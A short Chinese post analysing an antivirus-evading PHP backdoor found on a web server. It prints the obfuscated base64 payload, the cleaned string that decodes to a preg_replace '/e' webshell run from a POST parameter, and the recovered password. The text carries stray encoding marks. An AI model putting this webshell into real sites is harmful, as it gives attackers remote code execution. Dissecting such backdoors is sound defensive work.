一次巡查服務器的時候,發(fā)現網站存在漏洞,并已被植入后門�。因為服務器有安全狗���,由此斷定后門代碼是免殺的�����。
首先我們看看加密的源碼
其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接
“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgo
Ii9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”這樣的一串不規(guī)則的亂碼����。
現在的程序就變成了這樣
就算不懂PHP源代碼都能看出
$rc = str_replace("v","","svtvr_rveplvavce");"svtvr_rveplvavce"中去掉“v”剛好就是“str_replace”
那么下面這段加密內容也同樣要去掉多余“gc”
“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgoI
i9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”
得到一下base64_decode真實的加密內容
“CiRoaCA9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIi4icCIuImwiLiJhIi4iYyIuImUiOwokaGgoIi9bZGlzY3V
6XS9lIiwkX1BPU1RbJ2xvdnZldSddLCJBY2Nlc3MiKTsK"
我們在通過base64_decode解密剛才獲取的內容看看
那么真實的密碼就暴露了"lovveu"
在上WEB測試密碼確實正確�����。
